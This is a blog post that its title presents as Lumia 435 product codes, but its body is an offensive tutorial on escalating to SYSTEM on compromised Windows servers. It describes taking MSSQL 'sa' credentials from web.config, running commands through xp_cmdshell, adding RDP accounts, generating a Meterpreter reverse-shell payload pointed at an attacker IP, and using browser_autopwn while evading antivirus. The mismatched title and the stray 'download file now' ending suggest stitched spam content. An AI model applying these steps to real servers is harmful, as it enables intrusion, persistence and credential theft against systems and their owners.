Saturday, 5 August 2017
Product Codes Microsoft Lumia 435 RM 1069 1068 1070
Product Codes Microsoft Lumia 435 RM 1069 1068 1070
Most of us here can hack websites and servers. But what we hate the most is an error message- Access Denied! We know some methods to bypass certain restrictions using the symlink, privilege-escalation using local root exploits and some similar attacks.
But, these get the job done only on Linux servers. What about windows servers?

Here are some ways to bypass certain restrictions on windows servers or getting SYSTEM privileges.
- Using "sa" account to execute commands by MSSQL query via xp_cmdshell stored procedure.
- Using meterpreter payload to get a reverse shell over the target machine.
- Using browser_autopwn. (Really...)
- Using other tools like pwdump7, mimikatz, etc.
Note: 11 FIREFOX ADDONS A HACKER MUST HAVE AND USE
Using the tools is an easy way, but the real fun of hacking lies in the first three methods I mentioned above.
1. Using xp_cmdshell-
Most of the times on windows servers, we have read permission over the files of other IIS users, which is needed to make this method work.
If we are lucky enough, we will find login credentials of "sa" account of MSSQL server inside web.config file of any website.
You must be wondering why only "sa"?
Here, "sa" stands for Super Administrator and as the name tells, this user has all possible permissions over the server.
The picture below shows the connection string containing login credentials of "sa" account.

Using this, we can log into MSSQL server locally (using our web backdoor) & as well as remotely. I would recommend remote access because it does not generate webserver logs which would fill the log file with our web backdoor path.
So, after getting the "sa" account, we can login remotely using HeidiSQL
HeidiSQL is an awesome tool to connect to remote database servers. You can download ithere.
After logging into MSSQL server with sa account, we get a list of databases and their contents.

Now we can execute commands using MSSQL queries via xp_cmdshell. (With administrator privileges)
Syntax for the query is-
xp_cmdshell [command]
For example, if I need to know my current privileges, I would query-
xp_cmdshell whoami

This shows that I am currently NT Authority/System, which most of us know is the highest user in the windows user hierarchy.
Now we can go for some post exploitation like enabling RDP, adding accounts and allowing them to access RDP.
Note: If the server does not have xp_cmdshell stored procedure, you can install it yourself. There are many tutorials for that online.
2. Meterpreter Payload-
This method is quite easy and comes useful when we cannot read files of other users, but we can execute commands.
Using metasploit, generate a reverse shell payload binary.
For example-
msfpayload windows/shell_reverse_tcp LHOST=172.16.104.130 LPORT=31337 X > /tmp/1.exe
Now we will upload this executable to the server using our web backdoor.
Run multi/handler auxiliary at our end. (Make sure the ports are forwarded properly)
Now its time to execute the payload.
If everything goes right, we will get a meterpreter session over the target machine as shown below-
We can also use php, asp or other payloads.

3. Browser Autopwn-
This seems odd, as a way of hacking a server. But I myself found this as a clever way to do the job, especially in scenarios where we are allowed to execute commands, but we cannot run executables (our payloads) due to software restriction policies in domain environment.
Most of the windows servers have outdated Internet Explorer and we can exploit them if we can execute commands.
I think it is clear by now that what Im trying to explain ;)
We can start Internet Explorer from command line and make it browse to a specific URL.
Syntax for this-
iexplore.exe [URL]
Where URL would our server address which would be running browser_autopwn. After that we can use railgun to avoid antivirus detection.

4. Using readily available tools-
download file now